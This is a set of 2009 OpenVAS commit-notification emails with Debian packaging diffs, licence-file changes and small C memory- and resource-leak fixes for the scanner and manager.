nếu bạn đã tải vá» má»™t số bá»™ cầm phít cho má»™t phiên bản lá»›n " +#~ "Nessus cÅ© hÆ¡n (v.d. từ phiên bản 1.x) thì chúng có lẽ không hoạt Ä‘á»™ng cho " +#~ "đúng vá»›i phiên bản Nessus má»›i hÆ¡n. NhÆ° thế thì, đôi khi bạn nên loại bá» " +#~ "những bá»™ cÅ©." Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:38:55 UTC (rev 5408) @@ -2,7 +2,7 @@ # Derived from dh_make example. #export DH_VERBOSE=1 -#export DH_COMPAT=5 +#export DH_COMPAT=4 include /usr/share/dpatch/dpatch.make @@ -19,6 +19,7 @@ build-stamp: config.status dh_testdir $(MAKE) + ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch @@ -32,15 +33,19 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean + -rm -rf audit/exclude-list dh_clean build-stamp - [ ! -f libtool ] || rm -f libtool - [ ! -d bin/ ] || rm -rf bin/ install: build-stamp dh_testdir dh_testroot dh_clean -k - $(MAKE) install-minimal prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib +# Before we install we audit the plugins available +# If the audit passes we continue + $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib + ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) + ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) + rm -rf $(tmp)/var/run binary-indep: # Nothing to do, no arch-indep packages here. @@ -49,8 +54,10 @@ dh_testdir dh_testroot dh_installdebconf - dh_installdocs - dh_installchangelogs + dh_installdocs docs/plugins_api.txt + dh_installexamples extra/update-openvas-plugins \ + extra/describe-openvas-plugin + dh_installchangelogs ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ @@ -58,6 +65,7 @@ endif dh_compress dh_fixperms + chmod -x $(tmp)/var/lib/openvas/plugins/*.nes dh_installdeb dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ $(tmp)/var/lib/openvas/plugins/*.nes From scm-commit at wald.intevation.org Wed Oct 7 00:39:53 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:39:53 +0200 (CEST) Subject: [Openvas-commits] r5409 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006223953.44791861EAAA@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:39:52 +0200 (Wed, 07 Oct 2009) New Revision: 5409 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog Log: Update to the 1.0.5-1 package contents Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:38:55 UTC (rev 5408) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:39:52 UTC (rev 5409) @@ -1,3 +1,9 @@ +openvas-plugins (1.0.5-1) unstable; urgency=low + + * New upstream release. + + -- Javier Fernandez-Sanguino Pen~a Fri, 02 Jan 2009 01:41:25 +0100 + openvas-plugins (1.0.2-1) unstable; urgency=low * New upstream release. From scm-commit at wald.intevation.org Wed Oct 7 00:43:45 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:43:45 +0200 (CEST) Subject: [Openvas-commits] r5410 - trunk/winslad Message-ID: <20091006224345.698D8861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:43:44 +0200 (Wed, 07 Oct 2009) New Revision: 5410 Modified: trunk/winslad/ChangeLog trunk/winslad/xml.cpp Log: Fixed resource leak Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2009-10-06 22:39:52 UTC (rev 5409) +++ trunk/winslad/ChangeLog 2009-10-06 22:43:44 UTC (rev 5410) @@ -1,3 +1,7 @@ +2009-10-06 Tim Brown + + * xml.cpp: Fixed resource leak. + 2009-04-16 Felix Wolfsteller * ChangeLog, Makefile: Donated new lines at end of files. Modified: trunk/winslad/xml.cpp =================================================================== --- trunk/winslad/xml.cpp 2009-10-06 22:39:52 UTC (rev 5409) +++ trunk/winslad/xml.cpp 2009-10-06 22:43:44 UTC (rev 5410) @@ -390,6 +390,7 @@ if (!parser) { PRINTF("could not create XML parser\r\n"); + fclose(file); return -1; } From scm-commit at wald.intevation.org Wed Oct 7 00:46:52 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:46:52 +0200 (CEST) Subject: [Openvas-commits] r5411 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . patches Message-ID: <20091006224652.03B14861EAB2@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:46:52 +0200 (Wed, 07 Oct 2009) New Revision: 5411 Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: First packaging of the openvas-plugins-dfsg package by Joey Hess. Removes the audit/ subdir as it is not used anymore, contents of the packages are restricted to DFSG-free plugins as shown in the copyright. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:46:52 UTC (rev 5411) @@ -1,9 +1,29 @@ -openvas-plugins (1.0.5-1) unstable; urgency=low +openvas-plugins-dfsg (1.0.5-0.1) unstable; urgency=low - * New upstream release. + * New upstream release + * Stripped off all potentially non-free components - -- Javier Fernandez-Sanguino Pen~a Fri, 02 Jan 2009 01:41:25 +0100 + -- Joey Schulze Sat, 17 Jan 2009 20:54:39 +0100 +openvas-plugins (1.0.4-1) unstable; urgency=low + + * New upstream release + . Scripts with license CC-BY-SA 2.0 have been replaced by GPLv2+-licensed ones + * Remove exclude-script script which is not needed anymore + * Set Debian OpenVAS Maintainers as maintainer + * Add Javier Fernandez-Sanguino Pen~a, Jan Wagner, Tim Brown and me to + Uploaders + * Bump Standards-Version + * Add links to upstream version control system + * Set section to net + * Adjust license of NASL scripts to GPL since they come from the GPLv2 + feed [04_free_plugins.dpatch] + * Removed audit-plugins call since all NASL scripts are considered to be + licensed under the GPLv2 + * Removed debian/audit directory which is not needed anymore + + -- Joey Schulze Fri, 28 Nov 2008 11:36:34 +0100 + openvas-plugins (1.0.2-1) unstable; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:46:52 UTC (rev 5411) @@ -1,13 +1,18 @@ -Source: openvas-plugins +Source: openvas-plugins-dfsg Section: admin Priority: optional -Maintainer: Javier Fernandez-Sanguino Pen~a +Maintainer: Debian OpenVAS Maintainers +Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev -Standards-Version: 3.7.2 +Standards-Version: 3.8.0 +Vcs-Browser: http://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-plugins/packaging/debian/?root=openvas +Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins/packaging/debian/ Homepage: http://www.openvas.org -Package: openvas-plugins +Package: openvas-plugins-dfsg +Section: net Architecture: any +Provides: openvas-plugins Depends: ${shlibs:Depends}, debconf | debconf-2.0 Recommends: wget, openvas-server (>= 1.0), nmap, snmp Description: OpenVAS vulnerability tests Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:46:52 UTC (rev 5411) @@ -5,12 +5,7 @@ This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. [ For specific (c) statements see the individual files. ] -[ NOTE: The LICENSE.txt file distributed in the source package describes - Tenable's License which does not apply to the GPL Nessus plugins ] -The binary code of this package is distributed under the -GNU General Public License v2. - This package also provides the update-nessus-plugins and describe-nessus-plugin scripts (provided in the examples directory). These are copyright (c) 2003, George A. Theall @@ -22,14 +17,125 @@ These scripts are free software; you can redistribute it and/or modify it under the same terms as Perl itself. +Files in this package come from many different authors: + + A. Tarasco research. + Adam Baldwin + Alexis de Bernis + Anthony R. Plastino III + Astharot + Audun Larsen + Axel Nennker + Bekrar Chaouki + Brian Smith-Sweeney + Chandan S + Chaouki BEKRAR + Charles Thier + Chris Sullo + Christoff Breytenbach + David Kyger + Davy Van De Moere + Douglas Minderhout + Eli Kara + Erik Anderson + Erik Stephens + Erik Tayler + Farhad Koosha + Felix Huber + Ferdy Riphagen + Filipe Custodio + Forrest Rae + Frank Berger + Geoff Humes + Geoffroy Raimbault + George A. Theall + Georges Dagousset + Giovanni Fiaschi + Gregory Duchemin + H D Moore + Haroon Meer + Hendrik Scholz + Holger Heimann + Holm Diening + Immo Goltz + Intranode + James W. Abendschan + Jan-Oliver Wagner + Jasmin Amidzic . + Jason Haar + Jason Lidow + Javier Fernandez-Sanguino Peña + Javier Munoz Mellid + Javier Olascoaga + Jeff Adams + John Lampe + Jon Passki + Joseph Mlodzianowski + Josh Zlatin-Amishav + Julio César Hernández + Justin Seitz + Jøséph Mlødzianøwski + K-Otik.com + Keith Young + Laurent Facq <@u-bordeaux.fr> + Laurent Kitzinger + Lionel Cons , CERN + Lukas Grunwald + Mathieu Meadele + Mathieu Perrin + Matt Moore + Matthew North < matthewnorth at yahoo.com > + Michael J. Richardson + Michel Arboi + Nicolas Gregoire + Noam Rathaus , Beyond Security Ltd. + Orlando Padilla + Pasi Eronen + Patrik Karlsson + Paul Ewing + Paul Johnston + Pavel Kankovsky + Pedro Antonio Nieto Feijoo + Prizm + Randy Matz + Renaud Deraison + Rick McCloskey + Roelof Temmingh + Rui Bernardino + Scott Adkins + Scott Shebby scotts at scanalert.com + Sebastian Andersson + Stefaan Van Dooren + Sullo + Sverre H. Huseby + Tarik El-Yassem + Thomas Reinke + Tim Brown + Tobias Glemser + Tom Ferris + Tomi Hanninen + Veerendra GG + Victor Kirhenshtein + Vincent Renardias + Vlatko Kosturjak + Xue Yong Zhi + Yoav Goldberg + Zorgon + altomo at digitalgangsters.net + chewkeong at security.org.sg + deepquest + fr0stman + tony at libpcap.net + visigoth + + -------------------------------------------------------------------------- - Plugins + NASL Scripts -------------------------------------------------------------------------- -All of the C and NASL scripts included in this release (unless noted +All NASL scripts included in this release (unless noted otherwise in the plugin itself, see below) are distributed -under the "Nessus Script License" which is equivalent to the -GNU General Public License version 2: +under the GNU General Public License version 2: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by @@ -54,8 +160,8 @@ Debian advisories ----------------- -Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. -for more information see http://www.debian.org/licens +Debian advisories are (c) 1997-2006 Software in the Public Interest, Inc. +for more information see http://www.debian.org/license This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, Draft v1.0 or later @@ -179,302 +285,3 @@ derivative of the work in any standard (paper) book form is prohibited unless prior permission is obtained from the copyright holder.' to the license reference or copy. - -Gentoo advisories ------------------ - -Gentoo Advisories are (c) 2001-2005 Gentoo Foundation, Inc. - -The messages of Gentoo advisories are release under the -Creative Commons - Attribution / Share Alike license. - - You are free: - * to copy, distribute, display, and perform the work - * to make derivative works - * to make commercial use of the work - - Under the following conditions: - - by - Attribution. You must give the original author credit. - Share Alike. If you alter, transform, or build upon this work, you may - distribute the resulting work only under a license identical to this - one. - * For any reuse or distribution, you must make clear to others the - license terms of this work. - * Any of these conditions can be waived if you get permission from - the copyright holder. - Your fair use and other rights are in no way affected by the above. - -For more information see http://creativecommons.org/licenses/by-sa/2.0/ - -Full license: - - Creative Commons - - Creative Commons Legal Code - - Attribution-ShareAlike 2.0 - CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE - LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN - ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS - INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES - REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR - DAMAGES RESULTING FROM ITS USE. - - License - - THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS - CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS - PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE - WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS - PROHIBITED. - - BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND - AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS - YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF - SUCH TERMS AND CONDITIONS. - - 1. Definitions - a. "Collective Work" means a work, such as a periodical issue, - anthology or encyclopedia, in which the Work in its entirety in - unmodified form, along with a number of other contributions, - constituting separate and independent works in themselves, are - assembled into a collective whole. A work that constitutes a - Collective Work will not be considered a Derivative Work (as - defined below) for the purposes of this License. - b. "Derivative Work" means a work based upon the Work or upon the - Work and other pre-existing works, such as a translation, musical - arrangement, dramatization, fictionalization, motion picture - version, sound recording, art reproduction, abridgment, - condensation, or any other form in which the Work may be recast, - transformed, or adapted, except that a work that constitutes a - Collective Work will not be considered a Derivative Work for the - purpose of this License. For the avoidance of doubt, where the - Work is a musical composition or sound recording, the - synchronization of the Work in timed-relation with a moving image - ("synching") will be considered a Derivative Work for the purpose - of this License. - c. "Licensor" means the individual or entity that offers the Work - under the terms of this License. - d. "Original Author" means the individual or entity who created the - Work. - e. "Work" means the copyrightable work of authorship offered under - the terms of this License. - f. "You" means an individual or entity exercising rights under this - License who has not previously violated the terms of this License - with respect to the Work, or who has received express permission - from the Licensor to exercise rights under this License despite a - previous violation. - g. "License Elements" means the following high-level license - attributes as selected by Licensor and indicated in the title of - this License: Attribution, ShareAlike. - - 2. Fair Use Rights. Nothing in this license is intended to reduce, - limit, or restrict any rights arising from fair use, first sale or - other limitations on the exclusive rights of the copyright owner under - copyright law or other applicable laws. - - 3. License Grant. Subject to the terms and conditions of this License, - Licensor hereby grants You a worldwide, royalty-free, non-exclusive, - perpetual (for the duration of the applicable copyright) license to - exercise the rights in the Work as stated below: - a. to reproduce the Work, to incorporate the Work into one or more - Collective Works, and to reproduce the Work as incorporated in the - Collective Works; - b. to create and reproduce Derivative Works; - c. to distribute copies or phonorecords of, display publicly, perform - publicly, and perform publicly by means of a digital audio - transmission the Work including as incorporated in Collective - Works; - d. to distribute copies or phonorecords of, display publicly, perform - publicly, and perform publicly by means of a digital audio - transmission Derivative Works. - e. For the avoidance of doubt, where the work is a musical - composition: - i. Performance Royalties Under Blanket Licenses. Licensor waives - the exclusive right to collect, whether individually or via a - performance rights society (e.g. ASCAP, BMI, SESAC), - royalties for the public performance or public digital - performance (e.g. webcast) of the Work. - ii. Mechanical Rights and Statutory Royalties. Licensor waives - the exclusive right to collect, whether individually or via a - music rights society or designated agent (e.g. Harry Fox - Agency), royalties for any phonorecord You create from the - Work ("cover version") and distribute, subject to the - compulsory license created by 17 USC Section 115 of the US - Copyright Act (or the equivalent in other jurisdictions). - f. Webcasting Rights and Statutory Royalties. For the avoidance of - doubt, where the Work is a sound recording, Licensor waives the - exclusive right to collect, whether individually or via a - performance-rights society (e.g. SoundExchange), royalties for the - public digital performance (e.g. webcast) of the Work, subject to - the compulsory license created by 17 USC Section 114 of the US - Copyright Act (or the equivalent in other jurisdictions). - - The above rights may be exercised in all media and formats whether now - known or hereafter devised. The above rights include the right to make - such modifications as are technically necessary to exercise the rights - in other media and formats. All rights not expressly granted by - Licensor are hereby reserved. - - 4. Restrictions.The license granted in Section 3 above is expressly - made subject to and limited by the following restrictions: - a. You may distribute, publicly display, publicly perform, or - publicly digitally perform the Work only under the terms of this - License, and You must include a copy of, or the Uniform Resource - Identifier for, this License with every copy or phonorecord of the - Work You distribute, publicly display, publicly perform, or - publicly digitally perform. You may not offer or impose any terms - on the Work that alter or restrict the terms of this License or - the recipients' exercise of the rights granted hereunder. You may - not sublicense the Work. You must keep intact all notices that - refer to this License and to the disclaimer of warranties. You may - not distribute, publicly display, publicly perform, or publicly - digitally perform the Work with any technological measures that - control access or use of the Work in a manner inconsistent with - the terms of this License Agreement. The above applies to the Work - as incorporated in a Collective Work, but this does not require - the Collective Work apart from the Work itself to be made subject - to the terms of this License. If You create a Collective Work, - upon notice from any Licensor You must, to the extent practicable, - remove from the Collective Work any reference to such Licensor or - the Original Author, as requested. If You create a Derivative - Work, upon notice from any Licensor You must, to the extent - practicable, remove from the Derivative Work any reference to such - Licensor or the Original Author, as requested. - b. You may distribute, publicly display, publicly perform, or - publicly digitally perform a Derivative Work only under the terms - of this License, a later version of this License with the same - License Elements as this License, or a Creative Commons iCommons - license that contains the same License Elements as this License - (e.g. Attribution-ShareAlike 2.0 Japan). You must include a copy - of, or the Uniform Resource Identifier for, this License or other - license specified in the previous sentence with every copy or - phonorecord of each Derivative Work You distribute, publicly - display, publicly perform, or publicly digitally perform. You may - not offer or impose any terms on the Derivative Works that alter - or restrict the terms of this License or the recipients' exercise - of the rights granted hereunder, and You must keep intact all - notices that refer to this License and to the disclaimer of - warranties. You may not distribute, publicly display, publicly - perform, or publicly digitally perform the Derivative Work with - any technological measures that control access or use of the Work - in a manner inconsistent with the terms of this License Agreement. - The above applies to the Derivative Work as incorporated in a - Collective Work, but this does not require the Collective Work - apart from the Derivative Work itself to be made subject to the - terms of this License. - c. If you distribute, publicly display, publicly perform, or publicly - digitally perform the Work or any Derivative Works or Collective - Works, You must keep intact all copyright notices for the Work and - give the Original Author credit reasonable to the medium or means - You are utilizing by conveying the name (or pseudonym if - applicable) of the Original Author if supplied; the title of the - Work if supplied; to the extent reasonably practicable, the - Uniform Resource Identifier, if any, that Licensor specifies to be - associated with the Work, unless such URI does not refer to the - copyright notice or licensing information for the Work; and in the - case of a Derivative Work, a credit identifying the use of the - Work in the Derivative Work (e.g., "French translation of the Work - by Original Author," or "Screenplay based on original Work by - Original Author"). Such credit may be implemented in any - reasonable manner; provided, however, that in the case of a - Derivative Work or Collective Work, at a minimum such credit will - appear where any other comparable authorship credit appears and in - a manner at least as prominent as such other comparable authorship - credit. - - 5. Representations, Warranties and Disclaimer - - UNLESS OTHERWISE AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS - THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND - CONCERNING THE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, - INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, - FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF - LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF - ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW - THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY - TO YOU. - - 6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY - APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY - LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR - EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, - EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. - - 7. Termination - a. This License and the rights granted hereunder will terminate - automatically upon any breach by You of the terms of this License. - Individuals or entities who have received Derivative Works or - Collective Works from You under this License, however, will not - have their licenses terminated provided such individuals or - entities remain in full compliance with those licenses. Sections - 1, 2, 5, 6, 7, and 8 will survive any termination of this License. - b. Subject to the above terms and conditions, the license granted - here is perpetual (for the duration of the applicable copyright in - the Work). Notwithstanding the above, Licensor reserves the right - to release the Work under different license terms or to stop - distributing the Work at any time; provided, however that any such - election will not serve to withdraw this License (or any other - license that has been, or is required to be, granted under the - terms of this License), and this License will continue in full - force and effect unless terminated as stated above. - - 8. Miscellaneous - a. Each time You distribute or publicly digitally perform the Work or - a Collective Work, the Licensor offers to the recipient a license - to the Work on the same terms and conditions as the license - granted to You under this License. - b. Each time You distribute or publicly digitally perform a - Derivative Work, Licensor offers to the recipient a license to the - original Work on the same terms and conditions as the license - granted to You under this License. - c. If any provision of this License is invalid or unenforceable under - applicable law, it shall not affect the validity or enforceability - of the remainder of the terms of this License, and without further - action by the parties to this agreement, such provision shall be - reformed to the minimum extent necessary to make such provision - valid and enforceable. - d. No term or provision of this License shall be deemed waived and no - breach consented to unless such waiver or consent shall be in - writing and signed by the party to be charged with such waiver or - consent. - e. This License constitutes the entire agreement between the parties - with respect to the Work licensed here. There are no - understandings, agreements or representations with respect to the - Work not specified here. Licensor shall not be bound by any - additional provisions that may appear in any communication from - You. This License may not be modified without the mutual written - agreement of the Licensor and You. - - Creative Commons is not a party to this License, and makes no warranty - whatsoever in connection with the Work. Creative Commons will not be - liable to You or any party on any legal theory for any damages - whatsoever, including without limitation any general, special, - incidental or consequential damages arising in connection to this - license. Notwithstanding the foregoing two (2) sentences, if Creative - Commons has expressly identified itself as the Licensor hereunder, it - shall have all rights and obligations of Licensor. - - Except for the limited purpose of indicating to the public that the - Work is licensed under the CCPL, neither party will use the trademark - "Creative Commons" or any related trademark or logo of Creative - Commons without the prior written consent of Creative Commons. Any - permitted use will be in compliance with Creative Commons' - then-current trademark usage guidelines, as may be published on its - website or otherwise made available upon request from time to time. - - Creative Commons may be contacted at http://creativecommons.org/. - -Other plugins ------------- - -The following plugins do not hold a GPL license: - -netware_post_perl.nasl is (c) 2002 visigoth - - This script is distributed under a BSD style license - allowing free use and continued development provided - the above Copyright message remains. - Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:46:52 UTC (rev 5411) @@ -1,3 +1,4 @@ 01_makefile_fix_distclean.dpatch 02_adjust_examples.dpatch 03_makefile_clean_space.dpatch + Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:46:52 UTC (rev 5411) @@ -6,7 +6,7 @@ include /usr/share/dpatch/dpatch.make -tmp := $(CURDIR)/debian/openvas-plugins +tmp := $(CURDIR)/debian/openvas-plugins-dfsg CFLAGS := -g -Wall ifneq "$(findstring noopt,$(DEB_BUILD_OPTIONS))" "" @@ -19,7 +19,6 @@ build-stamp: config.status dh_testdir $(MAKE) - ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch @@ -33,18 +32,13 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean - -rm -rf audit/exclude-list dh_clean build-stamp install: build-stamp dh_testdir dh_testroot dh_clean -k -# Before we install we audit the plugins available -# If the audit passes we continue $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib - ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) - ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) rm -rf $(tmp)/var/run binary-indep: From scm-commit at wald.intevation.org Wed Oct 7 00:51:07 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:51:07 +0200 (CEST) Subject: [Openvas-commits] r5412 - in trunk/openvas-scanner: . openvassd Message-ID: <20091006225107.D5DA9861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:51:07 +0200 (Wed, 07 Oct 2009) New Revision: 5412 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/utils.c Log: Fixed memory leak, typos and resource leak. Also added todo for TOCTOU race condition on temp_file_name() (details sent to openvas-devel@) Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 22:46:52 UTC (rev 5411) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 22:51:07 UTC (rev 5412) @@ -1,3 +1,9 @@ +2009-10-06 Tim Brown + + * openvassd/utils.c: Fixed memory leak, typos and resource leak. Also added + todo for TOCTOU race condition on temp_file_name() (details sent to + openvas-devel@). + 2009-10-06 Michael Wiegand Post-release version bump. Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-06 22:46:52 UTC (rev 5411) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-06 22:51:07 UTC (rev 5412) @@ -330,8 +330,9 @@ f = fopen(fname, "w"); if(!f) { -fprintf(stderr, "'%s'\n", fname); + fprintf(stderr, "'%s'\n", fname); perror("create_pid_file() : open "); + free(fname); return; } fprintf(f, "%d\n", getpid()); @@ -356,7 +357,7 @@ * This function ensures that this name is not taken * already. */ -/** @todo consider using glib functions */ +/** @todo consider using glib functions, the current code is subject to a TOCTOU race condition */ char* temp_file_name() { @@ -365,7 +366,7 @@ do { if(fd > 0){ if(close(fd) < 0) - perror("close "); + perror("close"); } sprintf(ret, "%s/tmp", OPENVASSD_STATEDIR); mkdir(ret, 0700); @@ -373,6 +374,8 @@ fd = open(ret, O_RDONLY); } while (fd >= 0); + if(close(fd) < 0) + perror("close"); return ret; } From scm-commit at wald.intevation.org Wed Oct 7 00:54:17 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:54:17 +0200 (CEST) Subject: [Openvas-commits] r5413 - in trunk/openvas-manager: . src Message-ID: <20091006225417.EC29A861EAB2@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:54:16 +0200 (Wed, 07 Oct 2009) New Revision: 5413 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/otp.c Log: Fixed memory leak Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 22:51:07 UTC (rev 5412) +++ trunk/openvas-manager/ChangeLog 2009-10-06 22:54:16 UTC (rev 5413) @@ -1,3 +1,7 @@ +2009-10-06 Tim Brown + + * src/otp.c: Fixed memoey leak. + 2009-10-06 Matthew Mundell * src/tasks_sql.h (init_manage): Log database versions on version failure. Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-06 22:51:07 UTC (rev 5412) +++ trunk/openvas-manager/src/otp.c 2009-10-06 22:54:16 UTC (rev 5413) @@ -1020,6 +1020,7 @@ set_scanner_state (SCANNER_PLUGIN_LIST_OID); from_scanner_start += match + 1 - *messages; *messages = match + 1; + g_free (value); return 0; } return -2; From scm-commit at wald.intevation.org Wed Oct 7 00:56:33 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:56:33 +0200 (CEST) Subject: [Openvas-commits] r5414 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . old-config patches Message-ID: <20091006225633.AA508861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:56:33 +0200 (Wed, 07 Oct 2009) New Revision: 5414 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.config trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/po/ Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 